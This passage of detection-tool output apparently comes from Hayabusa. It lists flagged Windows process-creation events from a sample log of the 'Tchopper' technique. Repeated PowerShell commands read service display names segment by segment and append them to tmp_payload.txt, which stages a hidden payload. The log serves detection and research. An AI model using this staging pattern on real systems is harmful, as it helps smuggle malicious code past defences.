Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:31.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:33.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:33.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:34.682 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:34.682 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:36.122 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:36.138 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:37.638 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3e8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:37.638 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:39.090 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:39.090 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:40.532 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xadc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:40.547 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:41.996 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:41.996 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:43.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:43.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe70 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:44.878 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:44.893 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:46.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:46.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:47.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:47.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc64 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:49.273 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:49.273 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:50.726 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:50.742 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:52.180 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:52.180 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:53.645 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:53.645 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:55.099 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:55.114 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfd4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:56.538 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:56.554 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:58.007 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:58.007 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:59.462 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x750 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:59.462 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:00.900 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:00.900 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x470 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:02.337 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:02.337 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:03.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:03.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 